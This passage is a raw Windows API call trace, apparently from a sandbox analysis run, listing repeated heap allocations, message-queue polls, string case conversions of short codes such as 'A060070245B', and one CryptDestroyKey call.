(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0200.824] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0200.824] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0200.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0200.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0200.825] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0200.825] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.825] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0200.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0200.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0200.825] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.825] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.825] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0200.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.825] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.826] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.826] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0200.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0200.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.827] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0200.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0200.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0200.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0200.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0200.827] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0200.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0200.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0200.827] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0200.827] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0200.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0200.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0200.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0200.828] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0200.828] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.828] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0200.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0200.828] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.828] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0200.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0200.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0200.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.828] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.829] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0200.829] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0200.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0200.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0200.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.829] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0200.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0200.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0200.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0200.829] CryptDestroyKey (hKey=0xaa5860) returned 1 [0200.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0200.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0200.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0200.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0200.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0200.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0200.830] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0200.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0200.830] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0200.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0200.830] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0200.830] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0200.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0200.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0200.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0200.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0200.830] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0200.830] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0200.830] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0200.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0200.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0200.831] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0200.831] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0200.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0200.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0200.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0200.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.831] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0200.831] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0200.831] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0200.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0200.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0200.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0200.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.831] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0200.831] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0200.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0200.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0200.832] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0200.832] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0200.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0200.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0200.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.832] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0200.832] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0200.832] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0200.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0200.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0200.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.833] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0200.833] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0200.833] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0200.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0200.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0200.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0200.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.833] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0200.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0200.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0200.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0200.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.834] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0200.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0200.834] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0200.834] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0200.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0200.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0200.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0200.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0200.834] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0200.834] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.834] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0200.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0200.834] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0200.834] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0200.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0200.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0200.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0200.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0200.835] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0200.835] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.835] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0200.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0200.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0200.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0200.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0200.836] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.836] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0200.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0200.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0200.836] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0200.836] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0200.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0200.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0200.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0200.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0200.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0200.836] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0200.836] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0200.836] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0200.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0200.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0200.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0200.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0200.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0200.837] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0200.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0200.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0200.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0200.837] RtlAllocateHeap 